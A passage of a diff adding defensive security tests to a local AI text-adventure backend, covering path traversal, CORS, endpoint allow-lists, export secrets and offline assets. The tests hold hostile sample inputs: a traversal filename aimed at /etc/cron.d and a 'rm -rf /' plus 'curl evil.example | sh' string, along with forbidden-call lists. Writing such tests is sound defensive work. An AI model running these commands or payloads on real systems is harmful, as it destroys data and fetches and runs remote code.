application opens an archive: the bundle is JSON and imported sources are
|
||||
single files. So H09 is NOT APPLICABLE — and this test is what keeps that
|
||||
true, because the day somebody adds an unzip, it fails and H09 becomes
|
||||
required again.
|
||||
"""
|
||||
offenders = []
|
||||
for path in (BACKEND / "app").rglob("*.py"):
|
||||
body = path.read_text()
|
||||
for name in ("zipfile", "tarfile", "shutil.unpack_archive", "gzip.open",
|
||||
"py7zr", "rarfile"):
|
||||
if name in body:
|
||||
offenders.append(f"{path.name}: {name}")
|
||||
assert offenders == [], offenders
|
||||
|
||||
|
||||
def test_h09_an_upload_named_like_a_traversal_cannot_escape(client):
|
||||
"""H08's sibling: the filename is metadata and never a path.
|
||||
|
||||
Even with no archive extraction, an import takes a filename from the caller.
|
||||
It is stored, shown and exported — never joined to a directory.
|
||||
"""
|
||||
hostile = "../../../../etc/cron.d/pwned.md"
|
||||
response = client.post(
|
||||
f"/api/adventures/{client.adv_id}/knowledge",
|
||||
files={"file": (hostile, b"# nothing\n\ntext\n", "text/markdown")},
|
||||
data={"classification": "reference"},
|
||||
)
|
||||
assert response.status_code == 201, response.text[:300]
|
||||
stored = response.json()["original_filename"]
|
||||
assert "/" not in stored and ".." not in stored, stored
|
||||
assert not pathlib.Path("/etc/cron.d/pwned.md").exists()
|
||||
|
||||
|
||||
# ------------------------------------------------------------------- H10
|
||||
|
||||
def test_h10_a_wildcard_cors_origin_refuses_to_start(tmp_path):
|
||||
"""Startup refusal, proved by actually starting a process with it set.
|
||||
|
||||
Importing the module in-process would not do: the check runs at import time,
|
||||
and a test that reached it through `importlib` would still be this process,
|
||||
with this process's environment. A real interpreter is the only honest way
|
||||
to ask "does the application refuse to come up".
|
||||
"""
|
||||
result = subprocess.run(
|
||||
[sys.executable, "-c", "import app.main"],
|
||||
cwd=str(BACKEND), capture_output=True, text=True,
|
||||
env={**os.environ, "AIDND_CORS_ORIGINS": "*",
|
||||
"AIDND_DB_PATH": str(tmp_path / "x.db"),
|
||||
"AIDND_DATABASE_URL": "", "DATABASE_URL": ""},
|
||||
)
|
||||
assert result.returncode != 0, "the application started with a wildcard origin"
|
||||
assert "must not contain" in (result.stderr + result.stdout)
|
||||
|
||||
|
||||
def test_h10_a_named_origin_is_accepted(tmp_path):
|
||||
"""The control: the refusal above is about the wildcard, not about the var."""
|
||||
result = subprocess.run(
|
||||
[sys.executable, "-c", "import app.main"],
|
||||
cwd=str(BACKEND), capture_output=True, text=True,
|
||||
env={**os.environ, "AIDND_CORS_ORIGINS": "http://127.0.0.1:5173",
|
||||
"AIDND_DB_PATH": str(tmp_path / "y.db"),
|
||||
"AIDND_DATABASE_URL": "", "DATABASE_URL": ""},
|
||||
)
|
||||
assert result.returncode == 0, result.stderr[-400:]
|
||||
|
||||
|
||||
def test_h10_an_unknown_api_path_is_a_404_not_the_spa(client):
|
||||
"""A JSON API that answers HTML is one a client cannot tell has failed."""
|
||||
response = client.get("/api/nothing-here")
|
||||
assert response.status_code == 404
|
||||
assert "<!doctype" not in response.text.lower()
|
||||
|
||||
|
||||
def test_h10_an_unknown_page_path_is_the_spa(client):
|
||||
"""The other half, so the 404 above is a rule rather than a broken route."""
|
||||
response = client.get("/play/1")
|
||||
assert response.status_code in (200, 404)
|
||||
if response.status_code == 200:
|
||||
assert "<div id=\"root\">" in response.text or "<!doctype" in response.text.lower()
|
||||
|
||||
|
||||
# ------------------------------------------------------------------- H12
|
||||
|
||||
def test_h12_a_public_endpoint_written_behind_the_api_is_refused_at_request_time(client):
|
||||
"""ADR 011's whole point: the check is not only at the front door.
|
||||
|
||||
A settings row edited with `sqlite3` — or by anything that is not the API —
|
||||
must not become an outbound request to a cloud host. The provider re-checks
|
||||
before every request, so the tampered value fails at the moment it would be
|
||||
used.
|
||||
"""
|
||||
with SessionLocal() as db:
|
||||
settings = db.query(models.Settings).filter(
|
||||
models.Settings.user_id == client.user_id).first()
|
||||
settings.endpoint_url = "https://api.openai.com/v1"
|
||||
db.commit()
|
||||
|
||||
assert endpoints.rejection_reason("https://api.openai.com/v1") is not None
|
||||
with pytest.raises(endpoints.EndpointRejected):
|
||||
endpoints.check("https://api.openai.com/v1")
|
||||
|
||||
|
||||
def test_h12_the_api_refuses_the_same_value_at_the_front_door(client):
|
||||
response = client.put("/api/settings", json={
|
||||
"endpoint_url": "https://api.openai.com/v1"})
|
||||
assert response.status_code == 400
|
||||
assert "can't be used" in response.json()["detail"]
|
||||
|
||||
|
||||
@pytest.mark.parametrize("url,allowed", [
|
||||
("http://127.0.0.1:11434/v1", True),
|
||||
("http://[::1]:11434/v1", True),
|
||||
("http://192.168.1.50:11434/v1", True),
|
||||
("http://10.0.0.5:11434/v1", True),
|
||||
("https://100.64.0.9:11434/v1", True),
|
||||
("https://api.openai.com/v1", False),
|
||||
("https://api.anthropic.com/v1", False),
|
||||
("http://8.8.8.8:11434/v1", False),
|
||||
("https://example.com/v1", False),
|
||||
])
|
||||
def test_h12_the_address_rules_hold(url, allowed):
|
||||
assert (endpoints.rejection_reason(url) is None) is allowed
|
||||
|
||||
|
||||
def test_h12_the_m11_window_probe_obeys_the_same_rules():
|
||||
"""The new outbound request M11 introduced, held to the existing policy."""
|
||||
window = asyncio.run(contextwindow.probe("https://api.openai.com/v1", "gpt-4"))
|
||||
assert not window.verified
|
||||
assert "not allowed" in window.detail
|
||||
|
||||
|
||||
# ------------------------------------------------------------------- H04/H05
|
||||
|
||||
def test_h04_shell_text_in_narration_is_stored_as_text(client):
|
||||
"""Nothing executes what a model writes. There is no shell in the path."""
|
||||
shell = "`rm -rf /`; $(curl http://evil.example/x | sh)"
|
||||
ScriptedProvider.replies = [f"The innkeeper says: {shell}"]
|
||||
response = client.post(f"/api/adventures/{client.adv_id}/actions",
|
||||
json={"type": "do", "text": "ask"})
|
||||
assert response.status_code == 200
|
||||
page = client.get(f"/api/adventures/{client.adv_id}/actions?limit=3").json()
|
||||
assert any(shell in a["text"] for a in page["actions"])
|
||||
|
||||
|
||||
def test_h04_the_application_runs_no_subprocess_on_model_output():
|
||||
"""Structural: nothing in the turn path can execute anything."""
|
||||
for name in ("routers/adventures/turns.py", "narrative/extract.py",
|
||||
"narrative/apply.py", "narrative/validate.py"):
|
||||
body = (BACKEND / "app" / name).read_text()
|
||||
for forbidden in ("subprocess", "os.system", "eval(", "exec("):
|
||||
assert forbidden not in body, f"{name}: {forbidden}"
|
||||
|
||||
|
||||
def test_h05_an_invalid_state_event_is_refused_and_recorded(client):
|
||||
"""A proposal the validator refuses changes nothing and says why."""
|
||||
before = client.get(f"/api/adventures/{client.adv_id}/state").json()["document"]
|
||||
response = client.post(f"/api/adventures/{client.adv_id}/state/corrections", json={
|
||||
"events": [{"type": "obliterate_everything", "entity": "aldric"}],
|
||||
"note": "hostile",
|
||||
})
|
||||
assert response.status_code == 400
|
||||
after = client.get(f"/api/adventures/{client.adv_id}/state").json()["document"]
|
||||
assert after == before
|
||||
|
||||
|
||||
def test_h05_an_event_naming_an_unknown_entity_is_refused(client):
|
||||
before = client.get(f"/api/adventures/{client.adv_id}/state").json()["document"]
|
||||
response = client.post(f"/api/adventures/{client.adv_id}/state/corrections", json={
|
||||
"events": [{"type": "set_possession", "item": "ghost_item", "owner": "nobody"}],
|
||||
"note": "",
|
||||
})
|
||||
assert response.status_code == 400
|
||||
assert client.get(
|
||||
f"/api/adventures/{client.adv_id}/state").json()["document"] == before
|
||||
|
||||
|
||||
# ------------------------------------------------------------------- H03/I06
|
||||
|
||||
def test_h03_no_cloud_provider_is_required_or_configurable(client):
|
||||
settings = client.get("/api/settings").json()
|
||||
assert "api_key" not in settings
|
||||
for key, value in settings.items():
|
||||
assert "openai.com" not in str(value)
|
||||
assert "anthropic.com" not in str(value)
|
||||
|
||||
|
||||
def test_i06_an_export_carries_no_secret(client):
|
||||
bundle = client.get(f"/api/adventures/{client.adv_id}/export").json()
|
||||
body = json.dumps(bundle).lower()
|
||||
for secret in ("api_key", "apikey", "authorization", "secret.key", "bearer "):
|
||||
assert secret not in body, secret
|
||||
|
||||
|
||||
def test_h11_no_module_fetches_an_asset_at_runtime():
|
||||
"""H11: nothing downloads a tokenizer, a font or a stylesheet on first use.
|
||||
|
||||
`test_offline_assets.py` owns the built-SPA half. This is the backend half,
|
||||
and it is aimed at the one place it nearly went wrong: the tokenizer.
|
||||
"""
|
||||
from app.context import encoding
|
||||
|
||||
vendored = pathlib.Path(encoding.__file__).parent / "vendor"
|
||||
assert vendored.exists(), "the tokenizer table is not vendored"
|
||||
assert encoding.BPE_PATH.exists(), "the vendored merge table is missing"
|
||||
|
||||
# The claim is that nothing *fetches*, not that no URL appears: the module
|
||||
# records `SOURCE_URL` so the vendored copy can be re-derived, which is
|
||||
# provenance rather than behaviour. The first version of this test asserted
|
||||
# the absence of the string and failed on that comment — a harness defect,
|
||||
# recorded as such in the M11 report.
|
||||
body = pathlib.Path(encoding.__file__).read_text()
|
||||
for client in ("blobfile", "requests", "httpx", "urllib.request", "urlopen"):
|
||||
assert client not in body, client
|
||||
# And the table is read from the vendored file rather than downloaded.
|
||||
assert "read_bytes()" in body or "open(" in body
|
||||
@@ -68,7 +68,15 @@ def _async_client_calls(path: Path):
|
||||
|
||||
@pytest.mark.parametrize(
|
||||
"module",
|
||||
["providers/openai_compatible.py", "routers/settings.py"],
|
||||
[
|
||||
"providers/openai_compatible.py",
|
||||
"routers/settings.py",
|
||||
# M11: the context-window probe. Registered here rather than exempted —
|
||||
# this list existing is what made the new client visible at all, and the
|
||||
# point of adding a module to it is that its `verify=` is then asserted
|
||||
# on every run like the other two.
|
||||
"contextwindow.py",
|
||||
],
|
||||
)
|
||||
def test_every_http_client_uses_the_shared_context(module):
|
||||
"""Checked in the source rather than at runtime, because the failure this
|
||||
@@ -88,6 +96,10 @@ def test_every_http_client_uses_the_shared_context(module):
|
||||
def test_no_other_module_builds_its_own_client():
|
||||
"""If a third module starts making outbound requests, it has to be added to
|
||||
the list above rather than inheriting certifi-only trust by default."""
|
||||
known = {APP / "providers/openai_compatible.py", APP / "routers/settings.py"}
|
||||
known = {
|
||||
APP / "providers/openai_compatible.py",
|
||||
APP / "routers/settings.py",
|
||||
APP / "contextwindow.py",
|
||||
}
|
||||
found = {p for p in APP.rglob("*.py") if any(_async_client_calls(p))}
|
||||
assert found == known, f"unexpected httpx.AsyncClient call sites: {found - known}"
|
||||
|
||||
Reference in New Issue
Block a user